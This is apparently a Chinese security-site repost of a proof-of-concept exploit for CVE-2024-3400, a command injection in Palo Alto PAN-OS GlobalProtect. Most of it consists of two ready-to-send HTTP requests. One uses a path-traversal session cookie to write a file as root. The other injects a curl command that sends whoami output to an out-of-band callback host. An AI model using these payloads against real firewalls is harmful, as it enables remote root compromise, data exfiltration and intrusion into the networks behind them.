标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2024-3392]   作者: 闲云野鸡 发表于: [2024-04-19]

本文共 [35] 位读者顶过

Palo Alto OS 最近遭到命令注入0day攻击。这些是与零日漏洞相关的漏洞利用详细信息。

[出自:jiwo.org]

# CVE-2024-3400
 
CVE-2024-3400 Palo Alto OS Command Injection
 
 
send this HTTP request: 
 
 
```http
 
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```
 
![image](https://github.com/h4x0r-dz/CVE-2024-3400/assets/26070859/96803de5-1d8c-42ec-b1fc-60e8e4a0a954)
 
 
you will create hellome1337.txt file on the server with root access 
 
now if you try to access the files you should receive 403 insted of 404
 
![image](https://github.com/h4x0r-dz/CVE-2024-3400/assets/26070859/e579d4a6-11a5-4f7c-a3da-ba7b0cfa8a4d)
 
### Command Injection
 
```
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.01
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
 
```
 
 
 
 
More Info : 
https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/

评论

暂无
发表评论
 返回顶部 
热度(35)
 关注微信